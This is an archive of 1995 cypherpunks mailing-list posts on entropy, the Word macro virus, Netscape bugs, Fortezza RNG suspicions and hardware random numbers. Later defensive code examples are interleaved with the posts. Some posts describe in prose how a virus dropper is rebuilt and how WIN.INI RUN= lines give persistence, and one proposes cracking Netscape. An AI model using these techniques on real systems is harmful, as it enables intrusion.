MIME-Version: 1.0
Content-Type: text/plain


At 6:46 PM 9/22/95, David Van Wie wrote:

>Having overcome my initial skepticism on the entire topic of entropy, based
>on the useful pointers to the literature I have received, I agree
>wholeheartedly with the need for _positive_ design criteria against which
>designs may be evaluated.  For initial consideration, I recommend the
>following:
>
>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Hah! Another physicist converted to the information-theoretic view of entropy!

I should've pointed out in my reading list that several names stand out in
this interpretation:


- Charles Bennett

- Rolf Landauer

- John Wheeler


Just so you know.

ObNetscapeHack: None.


--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 22 Sep 95 16:47:15 PDT
To: cypherpunks@toad.com
Subject: MS Word Virus
Message-ID: <199509222347.TAA00888@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


For info and helpful links on the MS Word macro virus, see:


     URL: http://csrc.ncsl.nist.gov/first/resources/word.html


---------

Information on the Microsoft Word Virus Reports

   Comments welcomed: first-sec@first.org 
   
   This page contains links to information and related utilities for the
   Microsoft Word Macro Virus. The links and text on this page were
   mostly donated by a fellow FIRST member. The FIRST Secretariat would
   like to express its appreciation to this member and others who have
   contributed information.
   
   Microsoft's Writeup  Microsoft has a writeup on the virus-like macro
   and has a scanning tool to remove the problem.
   
   Macintosh advisory
   
   DataFellows Web page         DataFellows (the people who produce
   FProt) has an excellent informational web page, including images of
   what you would see if you had the virus. Also, you can download
   DataFellows' utility, which works on both PC's and Macintoshes.
   Download DataFellows Utility
   
   IBM Writeup  An excellent write up by IBM.
   
   NCSA page    The National Computer Security Association has a page
   which contains images of what you'd see if you had the virus.
   
   S&S Writeup  A writeup by S&S, the makers of Dr. Solomon's Antivirus
   Toolkit
   
   Sophos Plc   A page written by Sophos Plc.
          
   AVP Page
          Eugene Kaspersky of the AVP Computer Virus Research Lab, wrote
          this excellent web page on the virus.
          
   Dave Phillips Information page.
          A page written by Dave Phillips.
          
   NH&A
          A page consisting of an announcement and email traffic, written
          by NH&A.
          
   Datawatch Virus Definition Update
          Datawatch, (Virex), present a virus definition update to their
          product to find this virus on Macintoshes.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 22 Sep 95 17:53:21 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <Pine.SUN.3.90.950922194817.11370A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually it allows you to imbed data and commands to run. What the latest
MSWord virus did is imbed a virus dropper encoded in the word document
and then run it through the dos debug command to make it a binary file
(if you ever read the 40HEX virus magazine you should know how this works).
From there it just runs the dropper.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Fri, 22 Sep 1995 dmandl@panix.com wrote:

> Is that the new MS-Word you're thinking of?  I hear that it lets you
> imbed macros containing executable code in documents.  That's got to
> be one of the most dangerous ideas ever cooked up.
> 
>    --Dave.
> 
> --
> Dave Mandl
> dmandl@panix.com
> http://wfmu.org/~davem
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 19:41:09 PDT
To: cypherpunks@toad.com
Subject: T-Shirt Spams
Message-ID: <ac88c2e50602100403f6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:42 PM 9/22/95, Don Henson wrote:
>By now, everyone knows about the TSHIRT that has been classified as a
>MUNITION by the US Government. If you don't know, just send email to

Oh, really? Which government agency declared this t-shirt to be a munition?

Inquiring minds want to know.

(I wouldn't say more, except these t-shirt spams are getting wearisome.)

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcorgan@aeinet.com
Date: Fri, 22 Sep 95 20:35:47 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <Chameleon.950922203255.jcorgan@jcorgan-pc.wan.3com.com>
MIME-Version: 1.0
Content-Type: text/plain


>  Irregardless, it's a nasty bug given that you can crash anyone's
>netscape. And on Mac/Win3.1, it may even require a reboot.

Testing here with Win95 results in the equivalent of a segmentation fault...nicely handled.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 22 Sep 95 17:37:47 PDT
To: alt@iquest.net
Subject: Re: The Next Hack
Message-ID: <199509230033.UAA37480@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Al writes:

<snip>

>Maybe a good tactic would be to crack a "secure" server, and send the results
>ONLY to the server operators, along with a description of machine-time
>involved.
> 
>Put out a public press release, describing the machine-time involved, how
>it was possible due to weak crypto imposed by the government, and the possible
>economic and commercial implications of said weak crypto.
> 

I'm with Lucky, let's go after Netscape itself. They deserve it more
than their customers do, and they would then have a strong motivation
<evil grin> to fix it. The press release would then *only* involve
Netscape, and maybe a few C-punks could buy a few Netscape puts ;)
and donate the bucks made for something like Tim's stable remailer.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGNU321lp8bpvW01AQEtBQP7BdcB2W5bkCel56eUkZVSkPxJv4hPZren
3P/QtZAAVyF8Xt8692m4lPLVMqtgKqkrtzoqVg7zi/56tqwnLmUcv+TnqSxNdctb
H7durUUVgK+yqsz2Jd8pc0dPBFzT5c1IeZFjVmhG4+ChjzeAnd8WRoqy8BYfHr+w
5s8Tk2XlJF0=
=6CRC
-----END PGP SIGNATURE-----
Regards, Jim Ray

  "People are deceived in masses, but enlightened one at a time."
   -- Dick Boddie.
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crocker@cybercash.com (Stephen D. Crocker)
Date: Fri, 22 Sep 95 17:52:27 PDT
To: cypherpunks@toad.com
Subject: Re: Pitfall in producing random numbers
Message-ID: <ac88be5b140210046d3f@[204.254.34.75]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:20 AM 9/22/95, Norman Hardy wrote:
>The virtual PC clock proceeded forward in a very predictable
>manner. Perhaps the details were different but the nature of the pitfall is
>clear. I did not notice that pitfall mentioned in RFC 1750. (It's the only
>hazard that I know of that they missed.)

Neat!  I often talk about what happens if inter-keystroke timing is used but
the program is driven by a script.  In essence, running a program under
simulation amounts to running the clock under a script.

Next version.

Thanks,

Steve


--------------------
Steve Crocker                                     Main: +1 703 620 4200
CyberCash, Inc., Suite 430                        Desk: +1 703 716 5214
2100 Reston Parkway                               Fax:  +1 703 620 4215
Reston, VA 22091                                  crocker@cybercash.com
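
[Added example, not part of the original posts: a small C program that applies the entropy sum from David Van Wie's message to the scripted-clock pitfall discussed above. It compares the entropy a designer would predict for inter-keystroke intervals (uniform over 256 states) with the entropy measured from samples. The timestamp arrays are constructed for illustration and every function name is an assumption of this example.]

```c
#include <stddef.h>
#include <stdio.h>

#define NSTATES 256   /* criterion 2: the designer fixes n in advance */

/* log2(x) for x > 0 without libm: scale x into [1,2), then produce
 * the fraction bits by repeated squaring. */
static double log2_nolibm(double x)
{
    double result = 0.0, bit = 0.5;
    while (x >= 2.0) { x /= 2.0; result += 1.0; }
    while (x < 1.0)  { x *= 2.0; result -= 1.0; }
    for (int i = 0; i < 50; i++) {
        x *= x;
        if (x >= 2.0) { x /= 2.0; result += bit; }
        bit /= 2.0;
    }
    return result;
}

/* Predicted entropy if all n states were equally likely: log2(n) bits. */
double predicted_entropy_uniform(unsigned n)
{
    return log2_nolibm((double)n);
}

/* E = sum over observed states of -P_i log2(P_i), with P_i estimated
 * from the sample histogram. State i is the low 8 bits of a sample.
 * A plug-in estimate over N samples cannot exceed log2(N), so treat it
 * as a sanity check on the design, not as proof of randomness. */
double measured_entropy(const unsigned *samples, size_t count)
{
    size_t hist[NSTATES] = {0};
    double e = 0.0;
    if (count == 0)
        return 0.0;
    for (size_t i = 0; i < count; i++)
        hist[samples[i] & 0xFF]++;
    for (int s = 0; s < NSTATES; s++) {
        if (hist[s] == 0)
            continue;
        double p = (double)hist[s] / (double)count;
        e -= p * log2_nolibm(p);
    }
    return e;
}

/* Entropy of the intervals between successive timestamps (at most 64). */
double interval_entropy(const unsigned *ts, size_t count)
{
    unsigned deltas[64];
    size_t n = 0;
    for (size_t i = 1; i < count && n < 64; i++)
        deltas[n++] = ts[i] - ts[i - 1];
    return measured_entropy(deltas, n);
}

/* Constructed sample: keystroke times (clock ticks) on a real clock. */
const unsigned HUMAN_TS[9] = { 0, 113, 190, 342, 383, 496, 573, 725, 766 };

/* Constructed sample: the same program driven by a script, or run under
 * an emulator whose virtual clock advances by a fixed step per event. */
const unsigned SCRIPTED_TS[9] = { 0, 55, 110, 165, 220, 275, 330, 385, 440 };

int main(void)
{
    printf("predicted (uniform over %d states): %.3f bits\n",
           NSTATES, predicted_entropy_uniform(NSTATES));
    printf("keystroke intervals, real clock:    %.3f bits\n",
           interval_entropy(HUMAN_TS, 9));
    printf("same code under a scripted clock:   %.3f bits\n",
           interval_entropy(SCRIPTED_TS, 9));
    return 0;
}
```

Under the scripted clock every interval lands in the same state, so criterion 4 (P_i known and well-behaved) fails and the source yields 0 bits whatever the design predicted.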






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 22 Sep 95 13:52:27 PDT
To: herbs@interlog.com (Herb Sutter)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221341.JAA07664@gold.interlog.com>
Message-ID: <199509222051.NAA10687@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995 09:47:35 -0400, herbs@interlog.com (Herb Sutter)
wrote:
 
> Don't just look at this bug, though... check ALL your static buffers and
> include code to check for overflow writes.  For example, if Netscape is
> written in C or C++ and the above code uses strcpy(), you could change
> strcpy() to strncpy() everywhere (and then set the last char to null in case
> strncpy() didn't).  Your programmers will know what I mean.

Better yet, ban both strncpy and strncat.  Replace them with
differently-named routines (strbcpy and strbcat?) that, given a buffer
length, are GUARANTEED to always give you a properly terminated string
that (including the terminator) does not overflow the specified
buffer.

Even better, use a good string class that does all this automatically
all the time.
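
[Added example, not part of the original post and not Netscape's code: one way the bounded routines suggested above could look in C, next to the strncpy() behaviour they are meant to replace. The names strbcpy and strbcat come from the post; the signatures and the return-value convention (length the full result would have needed, so the caller can detect truncation) are assumptions of this example.]

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy src into dst, whose total capacity is dstsize bytes (terminator
 * included). The result is always NUL-terminated when dstsize > 0.
 * Returns strlen(src); a return value >= dstsize means truncation. */
size_t strbcpy(char *dst, const char *src, size_t dstsize)
{
    size_t srclen = strlen(src);
    if (dstsize > 0) {
        size_t n = (srclen < dstsize - 1) ? srclen : dstsize - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;
}

/* Append src to the string already held in dst (capacity dstsize).
 * Returns the length the untruncated result would have had. */
size_t strbcat(char *dst, const char *src, size_t dstsize)
{
    size_t used = 0;
    /* Bounded scan: never read past the buffer looking for the NUL. */
    while (used < dstsize && dst[used] != '\0')
        used++;
    if (used == dstsize)          /* dst was not terminated: leave it alone */
        return dstsize + strlen(src);
    return used + strbcpy(dst + used, src, dstsize - used);
}

/* The strncpy() pitfall from the quoted advice: when src does not fit,
 * strncpy() fills the buffer and writes no terminator. Returns 1 if the
 * 8-byte buffer was left without a NUL. */
int strncpy_left_unterminated(const char *src)
{
    char buf[8];
    memset(buf, 'X', sizeof buf);
    strncpy(buf, src, sizeof buf);
    return memchr(buf, '\0', sizeof buf) == NULL;
}

int main(void)
{
    char buf[8];
    size_t want = strbcpy(buf, "ABCDEFGHIJ", sizeof buf);
    printf("strbcpy -> \"%s\" (needed %zu bytes, truncated=%d)\n",
           buf, want + 1, want >= sizeof buf);
    want = strbcat(buf, "zz", sizeof buf);
    printf("strbcat -> \"%s\" (truncated=%d)\n", buf, want >= sizeof buf);
    printf("strncpy left the buffer unterminated: %d\n",
           strncpy_left_unterminated("ABCDEFGHIJ"));
    return 0;
}
```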





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 22 Sep 95 21:00:41 PDT
To: cypherpunks, gnu
Subject: The Fortezza random number generator is not trustworthy
Message-ID: <9509230400.AA19805@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Yes Fortezza cards can be instructed to produce a random number through one
> of its library calls (someday they'll have a real API).  One of the
> diagnostic tools I had tested this function.  What algorithm do they use?
> Haven't a clue.  Sources say that the RNG implementation may vary from vendor
> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

A caution.  I believe that CAPSTONE chips inside the Fortezza card are
highly likely to have back doors in them, above and beyond the Clipper
key escrow feature.  In particular, the random number generator is
probably compromised.

Many of the top-secret NSA documents I have received under FOIA about
Clipper say things like:

    "2.  I briefed the Board on the CLIPPER and CAPSTONE chips and
    their capabilities and summarized the recommendations of the
    19 November session:

    [TWO INCHES OF SOLID BLACKOUT]

    "3.  The Policy Board reached consensus on the following points:

	    [TWO LINES BLACKED OUT]

	    a. NSA will provide for the availability from a vendor of
    a single chip which can be programed for law enforcement access
    exclusively through a key escrow "law enforcement exploitation
    field."  The chip will have no trap doors or other methods
    of access.  This chip is called CLIPPER.

    [THREE INCHES OF SOLID BLACKOUT]

Note that they explicitly say "The chip will have no trap doors or
other methods of access" when talking about Clipper, but all
information about Capstone is blacked out.  There's no such guarantee
about Capstone.

The Digital Signature Algorithm embedded in Capstone is the best "host
algorithm" ever seen for subliminal channels.  A subliminal channel is
a means of communication which imparts information but cannot even be
detected by third parties.  By choosing numbers for DSA signatures
that are not completely random, several subliminal channels are
available, which can leak information as part of normal digital
signatures.  This subliminal information can only be read by someone
who knows a secret about how the non-random numbers were generated.
Gus Simmons, who did seminal work on subliminal channels while at
Sandia Labs, wrote a Eurocrypt paper on this a year or two ago.  The
Capstone chip knows private things like your DSA private key, the last
session key you loaded for Skipjack, etc.  So it has info that is
worth leaking to NSA wiretappers.

Now the plot thickens.  I submitted a FOIA request for all information
the NSA had on subliminal channels.  They responded that they had no
information!  We appealed and got the same answer.

However, subliminal channels are clearly part of the crypto literature
and knowledge base.  They were a major concern when Gus designed
nuclear test-ban verification crypto equipment in the '70s.  The ONLY
way NSA can legally claim to have no information on subliminal
channels is if the MERE FACT OF THE EXISTENCE AT NSA of information on
subliminal channels is classified.

In other words, if their information ABOUT subliminal channels is
classified, they can't say they have no documents; they have to say, e.g.
"We have ten documents and they're all classified."  If they have any
documents, they can only legally claim to have no documents if just
confirming the existence of the documents would itself reveal
classified info.  This is called "Glomarizing" and it's named for the
Glomar Explorer, a ship which was secretly used for dredging up code
books from sunken Soviet submarines.  Merely confirming that records
existed on the Glomar would have revealed classified information (i.e.
that the government was involved; the cover story was that a private
company was using it for deep-sea mining experiments).

Apparently, merely confirming that NSA knows anything about subliminal
channels would reveal classified information.

If the mere existence of documents on subliminal channels is
classified, it's probably because they are very actively and very
secretly using them.  And this tends to reinforce my perception that
they are using them in Capstone, the heart of the Fortezza card.

You're free to dismiss all this as paranoid rambling.  However, if you
use a Fortezza card to generate your random numbers, you have no way
to determine how these numbers are being generated.  Are they really
random?  How could you tell?  Would you rather get "random" numbers
from a classified NSA-designed chip that's part of a family designed
to subvert your privacy?  Or would you rather get them from a
third-party product whose design you can actually verify?  I'd prefer
a random number generator where I can pull one "at random" from stock,
take it apart, and verify that it really does what its designers say
it does.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 22 Sep 95 19:37:44 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
In-Reply-To: <199509221509.LAA09991@panix.com>
Message-ID: <Pine.SUN.3.90.950922213352.3995A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain



I'll jump into this conversation for a second. I've been wanting to set up
an IP proxy using Linux. It has support for IP over IP tunnels, and IP
Masquerading. The only thing needed is to encrypt the IP over IP tunnel.
Just my $0.02.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Fri, 22 Sep 1995, Duncan Frissell wrote:

> This should prove about as effective as the current French or Russian bans.
> What are they going to do when they figure out that there need no longer be
> such a thing as a telecoms operator.  We do most of the message packaging
> ourselves.  It will be a bit difficult for any connectivity supplier to tell
> what's going out via one of our encrypted IP sessions.
> 
> Question for Perry -- I'm assuming that it will soon be possible to
> originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
> you see technical problems with a TCP/IP laundry being established
> "somewhere" that strips trace info from one of my processes and prevents
> back tracing beyond the mouth of this encrypted pipe?
> 
> Also Perry, what did you think of the article "How Anarchy Works" in the
> latest Wired on the IETF?
> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:32:03 PDT
To: adam@lighthouse.homeport.org>
Subject: WordBasic and other macro languages
Message-ID: <199509230130.VAA04956@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:47 1995.09.22 -0400, dmandl@panix.com wrote:
>On Fri, 22 Sep 1995, Adam Shostack wrote:
>> 	I keep hearing this thought.  Isn't Win95 with its
>> 'executables in email' much more dangerous than Java, which at least
>> tries to address security?
>
>Is that the new MS-Word you're thinking of?  I hear that it lets you
>imbed macros containing executable code in documents.  That's got to
>be one of the most dangerous ideas ever cooked up.

It's no worse than the other hundreds of products that have macro languages
that can write files (even the ones that can't execute other programs are
dangerous if they can write a real executable to a file and, say, add a
corresponding RUN= line in a WIN.INI or the equivalent to get it executed
later).  Word's is just more visible because the macro itself can behave
like a virus, because of Word's autoexec-macro feature that can make the
macro run automatically unless the user disables those options on his copy.

Many versions of PostScript have this kind of hole, I understand; some
disable the file-manipulation commands to be more secure.  I remember
hearing recently that Ghostscript, popular on PCs, is one that does have the
file-manips, but all of this is hearsay so I can't say for sure.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019
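
[Added example, not part of the original post: a defender's check for the persistence path described above, where a program that can only write files still gets its payload executed through a RUN= line in WIN.INI. The C code below lists non-empty run= and load= entries in the [windows] section so they can be reviewed. load= is the companion key in that section and is not mentioned in the post; the sample file contents, the path in it and the function names are constructed for illustration.]

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample WIN.INI contents (not taken from a real system). */
const char SAMPLE_WIN_INI[] =
    "[windows]\r\n"
    "load=\r\n"
    "RUN=C:\\TEMP\\UNKNOWN.EXE\r\n"
    "NullPort=None\r\n"
    "[Desktop]\r\n"
    "Wallpaper=(None)\r\n"
    "[fonts]\r\n"
    "run=ignored-outside-windows-section\r\n";

/* Does the line start with the given section header? name is lowercase. */
static int is_section(const char *line, const char *name)
{
    for (; *name; name++, line++)
        if (tolower((unsigned char)*line) != *name)
            return 0;
    return 1;
}

/* If line is "key = value" (key is lowercase, compared without regard to
 * case), return a pointer to the value with leading blanks skipped. */
static const char *value_of(const char *line, const char *key)
{
    while (*line == ' ' || *line == '\t') line++;
    for (; *key; key++, line++)
        if (tolower((unsigned char)*line) != *key)
            return NULL;
    while (*line == ' ' || *line == '\t') line++;
    if (*line != '=')
        return NULL;
    line++;
    while (*line == ' ' || *line == '\t') line++;
    return line;
}

/* Scan INI text and record each non-empty run=/load= entry found in the
 * [windows] section as "key=value". Returns the number recorded. */
int audit_win_ini(const char *text, char found[][128], int max_found)
{
    static const char *keys[] = { "run", "load" };
    int n = 0, in_windows = 0;

    while (*text) {
        char line[256];
        size_t len = strcspn(text, "\n");
        size_t copy = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, text, copy);
        line[copy] = '\0';
        text += len + (text[len] == '\n');

        /* Drop the trailing CR and any trailing blanks. */
        while (copy > 0 && isspace((unsigned char)line[copy - 1]))
            line[--copy] = '\0';

        if (line[0] == '[') {
            in_windows = is_section(line, "[windows]");
            continue;
        }
        if (!in_windows || line[0] == ';')
            continue;
        for (int k = 0; k < 2; k++) {
            const char *v = value_of(line, keys[k]);
            if (v && *v && n < max_found)
                snprintf(found[n++], 128, "%s=%s", keys[k], v);
        }
    }
    return n;
}

int main(void)
{
    char found[8][128];
    int n = audit_win_ini(SAMPLE_WIN_INI, found, 8);
    for (int i = 0; i < n; i++)
        printf("autostart entry to review: %s\n", found[i]);
    return 0;
}
```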





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:33:29 PDT
To: cypherpunks@toad.com
Subject: Notes security question
Message-ID: <199509230133.VAA05532@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


While I'm at it, here's a question I've been wondering about recently: Why
is it I've never heard of any security issues with Lotus Notes?  Are there
no known weaknesses?  Or did existing weaknesses just not get much press
because Notes isn't a commercially visible consumer product like Netscape?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 22 Sep 95 20:15:36 PDT
To: cypherpunks@toad.com
Subject: another net phone (crypto)
Message-ID: <199509230313.XAA08112@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



I haven't seen this on the cypherpunk list so I thought I would forward it
as an FYI.  Interesting that source code is available!

>Subject: FWD: Free secure Internet voice communication
>From: John Walker <kelvin@fourmilab.ch>
>Subject: Free secure Internet voice communication
> 
> I've just released to the public domain Release 5 of Speak Freely for
> Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
> workstations.  Assuming you have a fast enough connection to the
> Internet (with reasonably consistent packet delivery time) and/or a
> fast enough CPU to perform audio compression in real time, you can
> talk to anybody on Earth connected to the Internet who's also running
> the program.  The Windows and Unix versions have entirely different
> user interfaces, but can intercommunicate.  Complete source code is
> available.
> 
> For communications security, IDEA, DES (less initial and final
> permutations), and one-time pad (re-used for each sound packet)
> encryption are available.  The intensely paranoid can enable any
> combination of these.  The documentation explains how to use PGP to
> securely exchange session keys before a conversation; an automatic
> session key generator is provided.  DES is included for commercial
> users who don't have a license to use the IDEA patent.  One-time pad
> encryption is for those with machines too slow to run IDEA or DES in
> real time.
> 
> I didn't include a public key mechanism because I wanted to avoid all
> the confusion.  If somebody wants to navigate the narrow strait
> between the RSA patent Scylla and Charybdis of export controls, the
> programming work to implement public keys is straightforward and the
> source code is yours to hack.
> 
> For further information, see:
> 
>     http://www.fourmilab.ch/netfone/windows/speak_freely.html
> 
> which describes the Windows version in detail and contains pointers to
> the Sun and SGI editions, as well as links to download source code and
> a ready-to-run executable for Windows.  You can also obtain the
> program by anonymous binary FTP:
> 
> Unix source code:
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz
> 
> Windows executable:
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip
> 
> Windows source code (for Visual C 1.5):
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip
> 
> 
Have Fun!
 
Regards,

Mark Hittinger
Internet Manager
WinNET Communications, Inc.
bugs@win.net  bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Fri, 22 Sep 95 23:37:50 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509230636.XAA25093@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



At 9:50 PM 9/20/95, John Gilmore wrote:
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.

Actually, even without going into the more analog characteristics of
these same standard cells (as Tim suggests: threshold measurement, DRAM
discharge time, and so on) you can do that using the really basic
behavior of really basic standard cells: I did that some 8 years ago
around a free-running ring oscillator (a bunch of basic logic gates in
a ring).

The problem I would look into first is that any such random number
generator (even the ones based on measurements of analog quantities)
would likely synchronize to some extent to the local noise (like CMOS
switching noise in sync with the chip clock). My impression is that if
you try and make the thing more impervious to noise, it will be less
random too, and the most prominent noise in such chips is not random
at all.

So, you could try to make it run fast, and place it in a slow chip
(like an older style UART), or you could try to kick it out of sync now
and then based on some external conditions (maybe) (bus signal arrival
time, serial line input, etc).

It's not guaranteed it would end up generating anything useful (maybe
not even to seed a software PRNG). I still like the idea of using
macroscopic events, many orders of magnitude different from system
operating frequencies: mouse location and timing sounds good. If you
want to get large amounts of random numbers, use a specially designed
separate box, well shielded, and running on batteries (like a walkman :-)

And a cryptographically secure software hash is always necessary.

Pierre.
pierre@shell.portal.com
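
The concern in the message above (a sampled ring oscillator synchronizing to clock-correlated noise, and a hash still being needed afterwards) can be made concrete with a toy simulation. This is an added example, not code from the original post; the phase model, the parameter values, the thresholds and all function names are assumptions chosen for illustration, and the data is simulated, not measured.

```python
import hashlib
import math
import random
from collections import Counter


def sample_oscillator(n, ratio, jitter, lock, seed, phase0=0.1):
    """Return n bits from a simulated oscillator sampled once per clock tick.

    ratio  - oscillator cycles per sample (only the fractional part matters)
    jitter - std-dev of the phase noise added per sample, in cycles
    lock   - 0.0 = free running (jitter accumulates); > 0 = the phase error is
             pulled back toward the clock each tick (synchronised to chip noise)
    """
    rng = random.Random(seed)            # fixed seed so the run is reproducible
    err, bits = 0.0, []
    for i in range(n):
        err = (1.0 - lock) * err + rng.gauss(0.0, jitter)
        phase = (phase0 + i * ratio + err) % 1.0
        bits.append(1 if phase < 0.5 else 0)     # square-wave output
    return bits


def ones_fraction(bits):
    """Monobit statistic: fraction of 1 bits."""
    return sum(bits) / len(bits)


def worst_autocorrelation(bits, max_lag=16):
    """Largest |autocorrelation| over lags 1..max_lag, returned as (lag, r)."""
    n = len(bits)
    mean = sum(bits) / n
    var = sum((b - mean) ** 2 for b in bits) / n
    if var == 0.0:                       # constant output: fully predictable
        return (1, 1.0)
    best = (0, 0.0)
    for lag in range(1, max_lag + 1):
        acc = sum((bits[i] - mean) * (bits[i + lag] - mean)
                  for i in range(n - lag))
        r = acc / ((n - lag) * var)
        if abs(r) > abs(best[1]):
            best = (lag, r)
    return best


def min_entropy_per_bit(bits, block=8):
    """Most-common-value estimate over non-overlapping blocks (simplified)."""
    blocks = [tuple(bits[i:i + block])
              for i in range(0, len(bits) - block + 1, block)]
    p_max = Counter(blocks).most_common(1)[0][1] / len(blocks)
    return -math.log2(p_max) / block


def health_check(bits, max_r=0.1, min_h=0.5):
    """Assumed thresholds: reject periodic or low-entropy raw output."""
    lag, r = worst_autocorrelation(bits)
    h = min_entropy_per_bit(bits)
    return {"ones": ones_fraction(bits), "lag": lag, "r": r, "h_min": h,
            "ok": abs(r) <= max_r and h >= min_h}


def condition(bits, out_bytes=32, safety=2.0):
    """Hash raw bits into a seed only if the raw estimate covers the output.

    The hash spreads whatever entropy is present; it cannot create any, so a
    failing source is refused rather than hashed into something that merely
    looks random.
    """
    report = health_check(bits)
    credited = report["h_min"] * len(bits)
    if not report["ok"] or credited < safety * 8 * out_bytes:
        return None
    raw = bytes(int("".join(map(str, bits[i:i + 8])), 2)
                for i in range(0, len(bits) - 7, 8))
    return hashlib.sha256(raw).digest()[:out_bytes]


if __name__ == "__main__":
    cases = {"locked to clock noise": dict(jitter=0.01, lock=0.5),
             "fast, free running": dict(jitter=0.5, lock=0.0)}
    for name, kw in cases.items():
        bits = sample_oscillator(32768, ratio=0.25, seed=1, **kw)
        seed_out = condition(bits)
        print(name, health_check(bits),
              seed_out.hex() if seed_out else "REJECTED")
```

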